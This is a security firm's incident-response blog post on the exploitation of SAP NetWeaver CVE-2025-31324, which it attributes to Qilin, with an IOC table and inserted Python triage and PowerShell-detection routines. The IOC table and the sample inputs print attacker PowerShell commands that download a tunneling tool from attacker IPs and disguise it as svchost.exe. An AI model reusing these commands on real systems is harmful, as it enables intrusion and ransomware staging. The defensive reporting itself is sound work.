SAP Zero – Frostbite: How Russian RaaS Actor Qilin Exploited CVE-2025-31324 Weeks Before its Public Disclosure

CVE-2025-31324

Matan Matalon

May 15, 2025

CVE-2025-31324 hit the security world like a tsunami – an easily exploitable SAP vulnerability affecting enterprise environments across the globe. But while most assumed its exploitation began post-disclosure, new evidence suggests otherwise.

During an incident response led by OP Innovate for a major global enterprise, we uncovered proof that this vulnerability was actively exploited nearly three weeks before it was made public. While recent articles point the finger towards China-Linked APTs, we identified communication with known Cobalt Strike C2 infrastructure and IP addresses linked directly to Qilin, a notorious Russian-speaking Ransomware-as-a-Service group.

What started as a routine post-disclosure investigation quickly evolved into a rare glimpse of zero-day exploitation in the wild – and possibly, early access to a vulnerability that hadn’t yet made headlines.

In this blog, we’ll walk you through:

  • How the attack unfolded weeks before disclosure
  • What we found during forensic analysis
  • Why we believe this ties into broader Qilin ransomware operations
  • What defenders can learn from this breach to prepare for future threats exploiting enterprise middleware like SAP
  • What organizations using SAP should do to stay safe

CVE-2025-31324: Simple Exploit, Serious Impact

CVE-2025-31324 is a critical vulnerability affecting SAP NetWeaver Visual Composer, a component commonly deployed in large enterprise environments. The flaw lies in the /developmentserver/metadatauploader endpoint, which fails to properly enforce authentication and authorization. This allows an unauthenticated attacker to upload arbitrary files, including web shells, to the server, with ease.

SAP assigned this a CVSS score of 10.0, reflecting its trivial exploitation path and severe impact, including the potential for remote code execution and full system compromise.

What makes this vulnerability especially dangerous is its accessibility:

  • No authentication required
  • Attack surface exposed via standard HTTP(S)
  • Commonly deployed in enterprise SAP environments

By the time SAP released an emergency patch and CISA added it to the KEV catalog, exploitation was underway – and, as we discovered, not just after the disclosure.

As a byproduct of the incident response, OP Innovate developed and deployed a dedicated WASP scanner to detect insecure deserialization vulnerabilities like CVE-2025-31324. This scanner is currently operational and actively scanning for affected SAP NetWeaver components.

Inside the Breach: From Minus-One to Zero 

OP Innovate’s investigation revealed two separate exploitations of CVE-2025-31324 within a major enterprise environment. The first occurred nearly three weeks before the vulnerability was publicly disclosed. The second happened shortly after the CVE was published. Although both incidents relied on the same unauthenticated file upload flaw in SAP NetWeaver, the threat infrastructure and observed behavior varied significantly. 

During the investigation, our team identified a publicly available Proof of Concept (POC) exploit for CVE-2025-31324 hosted on GitHub. The POC specifically targeted the vulnerable /developmentserver/metadatauploader endpoint and demonstrated how to upload arbitrary .jsp files, without authentication. This code closely matched the method used in the attack, helping us validate the exploitation chain and confirm that the threat actor leveraged this exact vulnerability in the wild.

Pre-Disclosure Exploitation

Initial Access:
Weeks before CVE-2025-31324 appeared in public advisories, an attacker exploited the vulnerable Metadata Uploader endpoint within SAP NetWeaver. The most probable access vector was a misconfigured load balancer that exposed internal services to the internet.

The attacker uploaded several JSP-based webshells to the SAP IRJ directory:

\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\

Webshells like random12.jsp, xxkmszdm.jsp, and gpfmddkh.jsp were automatically compiled and enabled full remote code execution.
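Because NetWeaver compiles each uploaded JSP into a class file in the irj work directory, the compiled artifacts double as a timeline: the following triage routine, an added example and not OP Innovate's tooling, baselines the JSPs present in the web root, flags the random eight-letter names seen here, and reads the compile time out of class names such as the JEE_jsp_bdtzvjzm_1743883325986.class entry from the IOC table. It assumes the 13-digit suffix of that class name is a Unix epoch in milliseconds; the directory listings it runs on are constructed from the file names in this post.

```python
import re
from datetime import datetime, timezone

# Naming patterns taken from the artifacts described in this write-up:
# uploaded webshells with random eight-lowercase-letter names in irj\root,
# and the classes the server compiles from them in irj\work.
RANDOM_JSP = re.compile(r"^[a-z]{8}\.jsp$")
COMPILED_CLASS = re.compile(r"^JEE_jsp_(?P<jsp>[A-Za-z0-9_]+?)_(?P<ts>\d{13})\.class$")


def compile_time(class_name):
    """UTC time at which NetWeaver compiled a JSP, read from the class name.
    ASSUMPTION: the 13-digit suffix is a Unix epoch in milliseconds."""
    m = COMPILED_CLASS.match(class_name)
    if not m:
        return None
    return datetime.fromtimestamp(int(m["ts"]) / 1000, tz=timezone.utc)


def triage(root_files, work_files, baseline=()):
    """Report every JSP in the web root that is not in the known-good baseline.

    Each finding is (jsp_name, reasons). A matching compiled class in the
    work directory adds the compile time, which dates the shell's compilation
    (normally its first request) even after web logs have rolled over."""
    compiled = {}
    for name in work_files:
        m = COMPILED_CLASS.match(name)
        if m:
            compiled[m["jsp"]] = compile_time(name)
    findings = []
    for jsp in root_files:
        if not jsp.endswith(".jsp") or jsp in baseline:
            continue
        reasons = ["not in baseline"]
        if RANDOM_JSP.match(jsp):
            reasons.append("random 8-char name")
        stem = jsp[:-4]
        if stem in compiled:
            reasons.append("compiled at " + compiled[stem].strftime("%Y-%m-%d %H:%M:%S UTC"))
        findings.append((jsp, reasons))
    return findings


if __name__ == "__main__":
    # Constructed directory listings built from the file names in this post.
    root = ["index.jsp", "random12.jsp", "bdtzvjzm.jsp", "xxkmszdm.jsp"]
    work = ["JEE_jsp_index_1700000000000.class", "JEE_jsp_bdtzvjzm_1743883325986.class"]
    for jsp, why in triage(root, work, baseline=("index.jsp",)):
        print(jsp, "->", "; ".join(why))
```

Run it against a real listing of both directories and compare the earliest compile time with the vendor's disclosure date to establish whether an instance was hit pre-disclosure.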

Once in, the attacker attempted to:

  • Initiate outbound communication with Cobalt Strike C2 infrastructure (180[.]131[.]145[.]73, 184[.]174[.]96[.]74)
  • Download and stage a payload (rs64c.exe) from http[:]//184[.]174[.]96[.]74/rs64c.exe, a reverse SOCKS5 tunneling tool
  • Save the payload locally as svchost.exe and prepare for execution

What We Saw:
The attacker’s use of IP address 184[.]174[.]96[.]74 and the tool rs64c.exe closely matches infrastructure and tools previously associated with Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group. This indicates the activity was likely part of an initial access attempt, potentially intended to prepare the ground for a future ransomware attack or to sell access to other threat actors.

What Failed:

  • The Firewall blocked outbound C2 traffic
  • The EDR quarantined all downloaded payloads
  • Neither lateral movement nor persistence mechanisms were observed
  • The attacker attempted to clean up artifacts by issuing Remove-Item commands for files like random12.jsp and ESC.exe, but the files had already been quarantined by EDR, rendering the cleanup ineffective.

Post-Disclosure Exploitation

Initial Access:
Shortly after CVE-2025-31324 was disclosed publicly, a second exploitation attempt was observed. The attacker again leveraged the same SAP endpoint to upload webshells. However, there is no evidence linking this activity to the pre-disclosure attacker, as no overlapping infrastructure or tools were observed.

What the Attacker Did:
New webshells – such as ran_new.jsp, bdtzvjzm.jsp, and decoxfiv.jsp – were deployed, followed by attempts to download executables via PowerShell:

  • https://bashupload.com/bSLrt/test.exe → temp.exe
  • https://bashupload.com/HUbaF/test.exe → temp_new.exe

What Failed:

  • All download attempts were blocked or quarantined
  • No execution, lateral movement, or communication with external infrastructure occurred
  • Deployed files were manually removed, likely by the attacker

Outcome

In both incidents, the attacker successfully gained initial access and remote code execution by exploiting CVE-2025-31324. However, post-exploitation efforts failed completely in both cases:

  • No payloads were executed
  • No data was exfiltrated
  • No movement beyond the SAP servers occurred

Defensive controls – including network-layer blocking and endpoint containment – prevented what may have been a planned ransomware delivery. The pre-disclosure incident bore the hallmarks of Qilin-linked infrastructure, while the post-disclosure event remains unattributed but similarly neutralized.

The Qilin Connection: Exploiting SAP, Staging for Ransomware

The pre-disclosure activity observed in this incident shows clear overlap with tactics and infrastructure linked to Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group active since 2022. Qilin operates through an affiliate model, frequently leveraging Initial Access Brokers (IABs), commodity tooling, and staged infrastructure to prepare environments for high-impact ransomware deployment.

Qilin’s Tactics

According to public threat intelligence from multiple sources, Qilin affiliates typically follow a consistent operational pattern:

  • Initial access via exposed web applications or phishing
  • Deployment of tunneling utilities or frameworks like Cobalt Strike
  • Network scoping, privilege escalation, and lateral movement
  • Delayed ransomware deployment and data extortion

This incident mirrors several elements of that playbook – including unauthenticated access via a known (or yet to be known) CVE, staging of remote access tools, and outbound communication with known infrastructure.

Supporting Evidence from Official Intelligence

Prior to public awareness of this specific intrusion, Indonesia’s National Cyber and Crypto Agency (BSSN) published an official IOC bulletin – IOC_QILIN Ransomware v1.3, dated April 15, 2025 – listing infrastructure indicators linked to Qilin ransomware activity. This bulletin included:

  • IP address: 184[.]174[.]96[.]70
  • File path: C:\ProgramData\rs64c.exe
  • IP address: 180[.]131[.]145[.]73

Each of these indicators corresponds closely with evidence from this incident:

  • The attacker downloaded the tunneling tool rs64c.exe from http[:]//184[.]174[.]96[.]74/rs64c.exe — an IP in the same 184[.]174[.]96[.]0/24 subnet as the Qilin-linked IP 184[.]174[.]96[.]70
  • The binary was written to the exact same path listed in the bulletin: C:\ProgramData\rs64c.exe
  • The attacker attempted to reach 180[.]131[.]145[.]73, which is explicitly listed in the BSSN bulletin as Qilin infrastructure

These direct overlaps – including exact file paths and IP matches – support a high-confidence assessment that the infrastructure leveraged in this incident aligns with known Qilin operations.

Use of Cobalt Strike

Cobalt Strike remains a standard tool in post-exploitation phases of many RaaS operations, including Qilin. Its modular, red-team-oriented architecture makes it ideal for maintaining persistence, conducting reconnaissance, and staging ransomware payloads. While beacon sessions were blocked in this case, the attacker’s preparation and infrastructure use were consistent with a pre-ransomware staging phase typical of Qilin affiliates.

Recommendations

Based on the observed tactics and mitigated actions during the incident, the following recommendations are aimed at reducing exposure to similar threat activity and improving organizational resilience against exploitation and ransomware staging:

  1. Patch and Restrict Exposure of SAP NetWeaver Systems
  • Immediately apply the vendor patch addressing CVE-2025-31324 on all affected SAP NetWeaver instances.
  • Implement strict network segmentation to ensure SAP interfaces are not publicly accessible unless absolutely necessary.
  • Review reverse proxy/load balancer configurations (e.g., F5) to avoid accidental exposure of internal endpoints.
  2. Web Application Hardening
  • Enable web application firewalls (WAFs) or filtering controls that block unauthorized file uploads and exploit attempts.
  • Regularly audit for the presence of custom endpoints (like /metadatauploader) that may bypass authentication or input validation.
  3. Endpoint and Malware Defense
  • Maintain EDR coverage on all internet-facing and business-critical systems. Ensure automatic quarantine is enabled and up-to-date detection signatures are deployed.
  • Block execution from temporary paths such as C:\ProgramData\ and other commonly abused directories via group policy or EDR rules.
  • Prevent execution of unsigned or suspicious binaries downloaded via PowerShell or other scripting interfaces.
  4. Network Controls and C2 Disruption
  • Enforce egress filtering on firewall and proxy layers to block outbound connections to untrusted IPs and domains.
  • Block traffic to known Cobalt Strike and reverse proxy tools (e.g., rs64c.exe) using threat intelligence feeds (e.g., ThreatFox, AbuseIPDB).
  • Monitor for unusual outbound communication to rare external IPs, particularly from servers not expected to initiate such traffic.
  5. PowerShell Monitoring and Restrictions
  • Enable PowerShell Script Block Logging and Constrained Language Mode on servers.
  • Alert on suspicious PowerShell activity, especially:
    • Invoke-WebRequest or wget
    • Downloading to uncommon paths
    • Use of Remove-Item for cleanup
  6. Incident Readiness and Response
  • Review and test incident response plans, especially for pre-ransomware detection.
  • Ensure your SOC and IR teams are trained to identify early-stage intrusion activity, even before payload delivery (e.g., C2 staging, tunneling tools).
  • Establish a process to cross-reference alerts with public IOCs, such as those shared in bulletins like BSSN IOC_QILIN v1.3.
  7. Threat Intelligence Integration
  • Subscribe to and regularly review government and vendor-published IOC feeds.
  • Integrate IOC correlation into SIEM and SOAR workflows, ensuring real-time blocking or escalation on high-fidelity matches.
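The PowerShell monitoring recommendation above (download cradles, uncommon output paths, Remove-Item cleanup) can be turned into a scoring rule over decoded script-block text; the routine below is an added example written for this page, not OP Innovate's tooling. The sample script blocks are constructed from the command lines in the IOC table; the staging directories and masqueraded system-binary names other than C:\ProgramData\ and svchost.exe are my additions.

```python
import re

# Patterns derived from the command lines recorded in this incident.
DOWNLOAD_CMD = re.compile(r"\b(invoke-webrequest|iwr|wget|curl)\b", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
OUTFILE = re.compile(r"-outfile\s+['\"]?([^\s'\"]+)", re.I)
REMOVE_CMD = re.compile(r"\b(remove-item|rm|del|erase)\b", re.I)

# Writable directories abused for staging in this case and commonly elsewhere.
STAGING_DIRS = ("c:\\programdata\\", "c:\\windows\\temp\\", "c:\\users\\public\\")
# Names a dropped file may borrow to blend in; legitimate only under System32.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
# Markers that a deletion targets web content rather than ordinary files.
WEB_CONTENT = (".jsp", ".jspx", "\\irj\\")


def score_command(cmd):
    """Return (severity, reasons) for one PowerShell command line."""
    reasons = []
    low = cmd.lower()
    if DOWNLOAD_CMD.search(cmd) and URL.search(cmd):
        reasons.append("download cradle")
        out = OUTFILE.search(cmd)
        if out:
            path = out.group(1).lower()
            if path.startswith(STAGING_DIRS):
                reasons.append("writes to staging directory")
            if path.rsplit("\\", 1)[-1] in SYSTEM_NAMES and "\\system32\\" not in path:
                reasons.append("system binary name outside System32")
    if REMOVE_CMD.search(cmd) and any(marker in low for marker in WEB_CONTENT):
        reasons.append("cleanup of web content")
    severity = "high" if len(reasons) >= 2 else "medium" if reasons else "none"
    return severity, reasons


def scan(script_blocks):
    """Score decoded script-block text (PowerShell Event ID 4104) and return
    only the entries that fired, highest severity first."""
    hits = [(cmd, *score_command(cmd)) for cmd in script_blocks]
    hits = [h for h in hits if h[1] != "none"]
    return sorted(hits, key=lambda h: h[1] != "high")


if __name__ == "__main__":
    # Constructed sample blocks modelled on the IOC table in this post.
    SAMPLE = [
        "powershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:\\programdata\\svchost.exe",
        "powershell Invoke-WebRequest -Uri https://bashupload.com/bSLrt/test.exe -OutFile C:\\ProgramData\\temp.exe",
        "Remove-Item \\usr\\sap\\PP1\\J01\\j2ee\\cluster\\apps\\sap.com\\irj\\servlet_jsp\\irj\\root\\random12.jsp",
        "Get-ChildItem C:\\Windows\\Temp | Measure-Object",
    ]
    for cmd, sev, why in scan(SAMPLE):
        print(f"[{sev}] {cmd}\n    {', '.join(why)}")
```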

Unique Indicators of Compromise (IOCs)

| IOC Type | IOC | Hash type | Description | Notes |
|---|---|---|---|---|
| File Hash | D1C43F8DB230BDF18C61D672440EBA12 | MD5 | Old executable test.exe. Downloaded to: C:\ProgramData\temp.exe. Download URL: https://bashupload.com/bSLrt/test.exe | |
| File Hash | 6914B1F5B6843341FAFDFAA9D57818B9 | MD5 | New executable test.exe (same filename, different hash and URL). Downloaded to: C:\ProgramData\temp_new.exe. Download URL: https://bashupload.com/HUbaF/test.exe | |
| IP Address | http[:]//184[.]174[.]96[.]70 | | Known Qilin IOC; used as command-and-control or payload host. | |
| IP Address | http[:]//184[.]174[.]96[.]74 | | Staging IP used to host the rs64c.exe reverse tunneler. | |
| IP Address | 180[.]131[.]145[.]73 | | Command-and-control IP associated with Qilin; pinged from the target system. | |
| URL | http[:]//184[.]174[.]96[.]70/rs64c.exe | | Download URL for the reverse SOCKS5 tunneler (IOC-listed host). | |
| URL | http[:]//184[.]174[.]96[.]74/rs64c.exe | | Download URL for the reverse SOCKS5 tunneler (IOC-listed host). | |
| Command Line | powershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:\programdata\svchost.exe | | PowerShell command used to download rs64c.exe to a writable directory. | |
| Command Line | powershell Invoke-WebRequest -Uri https://bashupload.com/bSLrt/test.exe -OutFile C:\ProgramData\temp.exe | | Command used to download a malicious executable via the Bashupload service. | |
| Command Line | PowerShell Remove-Item | | Cleanup command to remove dropped files. | Used to delete ESC.exe and random12.jsp |
| Path | \usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\ | | SAP webroot path used by the attacker to upload malicious JSP files. | Used for uploading malicious JSP files |
| Directory | \Device\HarddiskVolume12\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\ | | Directory where JSPs were auto-compiled to .class files — evidence of exploitation. | SAP class file path; the creation of these classes proves the webshells were executed |
| File Names | random12.jsp, duchyofn.jsp, rbekqaun.jsp, rwlrqhrj.jsp, xxkmszdm.jsp, gpfmddkh.jsp, bdtzvjzm.jsp, decoxfiv.jsp, zdulvrqu.jsp, ran_new.jsp | | Randomized JSP webshells, automatically compiled by the SAP server, generating corresponding .class files inside the \irj\work\ folder. Random 8-char names for stealth. | Uploaded to SAP root path |
| File Names | JEE_jsp_bdtzvjzm_1743883325986.class | | Auto-compiled JSP class file resulting from an uploaded webshell. | |
| File Names | test.exe | | Malicious executable downloaded from Bashupload and staged in ProgramData. | Dropped in SAP root path |
| File Names | ESC.exe | | Malicious binary dropped via webshell, later deleted via PowerShell. | Dropped in SAP root path |

Protect Your Systems with OP Innovate

As cyber threats grow more sophisticated, organizations need trusted partners who can deliver both proactive defense and rapid response. OP Innovate helps businesses stay secure by combining immediate incident response services with advanced vulnerability detection.

Our dedicated WASP scanner continuously monitors SAP environments for critical weaknesses like insecure deserialization flaws, including CVE-2025-31324, helping organizations fix issues before attackers can exploit them. In parallel, our Incident Response (IR) teams are ready to rapidly contain and investigate any breach, minimizing disruption and restoring security.

We share regular threat intelligence updates and security insights. Sign up to receive our latest updates straight to your inbox:
